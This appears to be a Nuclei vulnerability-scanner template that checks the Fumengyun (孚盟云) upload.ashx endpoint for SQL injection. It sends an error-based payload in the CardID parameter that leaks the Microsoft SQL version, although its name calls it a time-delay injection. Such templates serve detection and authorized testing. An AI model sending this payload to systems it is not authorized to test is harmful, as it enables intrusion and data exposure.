id: fumengyun-upload_ashx-image-sql

info:
  name: 孚盟云 upload.ashx image SQL延时注入漏洞
  author: fumengyun
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        GET /Ajax/upload.ashx?action=image&imagefb=FID&CardID=1'+AND+1=@@VERSION-- HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Microsoft SQL'
          - '转换成数据类型 int 时失败'
        condition: and
      - type: status
        status: 
          - 500